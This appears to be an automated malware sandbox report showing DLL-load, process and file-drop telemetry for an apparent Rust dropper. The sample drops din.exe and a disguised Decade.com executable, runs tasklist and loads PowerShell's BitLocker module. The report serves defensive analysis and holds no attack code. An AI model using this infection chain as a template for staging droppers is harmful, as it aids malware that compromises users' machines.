Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\ProgramData\din.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll

Source: C:\ProgramData\din.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: xoJxSAotVM.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: xoJxSAotVM.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: xoJxSAotVM.exe

Static file information: File size 2010112 > 1048576

Source: xoJxSAotVM.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x159200

Source: xoJxSAotVM.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: xoJxSAotVM.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: xoJxSAotVM.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: xoJxSAotVM.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: xoJxSAotVM.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: xoJxSAotVM.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: xoJxSAotVM.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: xoJxSAotVM.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: cryptosetup.pdbGCTL source: HLNYCB.16.dr
Source:	Binary string: cryptosetup.pdb source: HLNYCB.16.dr
Source:	Binary string: rustdropper.pdb source: xoJxSAotVM.exe

Source: xoJxSAotVM.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: xoJxSAotVM.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: xoJxSAotVM.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: xoJxSAotVM.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: xoJxSAotVM.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\ProgramData\din.exe

Code function: 6_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

6_2_00406328

Source: din.exe.0.dr	Static PE information: real checksum: 0x12ac7c should be: 0x12b95f
Source: xoJxSAotVM.exe	Static PE information: real checksum: 0x0 should be: 0x1f83de

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\112974\Decade.com

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Jump to dropped file
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	File created: C:\ProgramData\din.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File created: C:\ProgramData\GDT0R9H4EU37\HLNYCB	Jump to dropped file

Source: C:\Users\user\Desktop\xoJxSAotVM.exe	File created: C:\ProgramData\din.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	File created: C:\ProgramData\GDT0R9H4EU37\HLNYCB			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com

File created: C:\ProgramData\GDT0R9H4EU37\HLNYCB

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
